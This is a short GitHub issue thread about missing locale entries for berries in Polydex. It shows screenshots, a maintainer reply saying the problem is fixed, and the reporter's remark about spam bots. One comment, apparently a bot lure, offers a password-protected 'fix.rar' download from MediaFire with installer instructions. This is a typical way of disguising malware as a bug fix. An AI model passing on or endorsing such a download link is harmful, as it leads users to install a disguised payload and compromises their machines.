### ISSUE TITLE
Berries have missing locale in Polydex

### ISSUE THREAD

**Issue by noiverre** [MykhailoOpryshok/Borukva-Food#10]
![image](https://github.com/user-attachments/assets/925b1ae1-7ba4-4be3-9fa0-592876c08a10)
![image](https://github.com/user-attachments/assets/9965a1a8-9a61-46f7-8423-f6e9fc917a70)

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by noiverre** [comment]
these bots appear again.. sorry but I have to unsub this issue, the notifications are spamming my e-mails

**Comment by MykhailoOpryshok** [comment]
fixed in new version
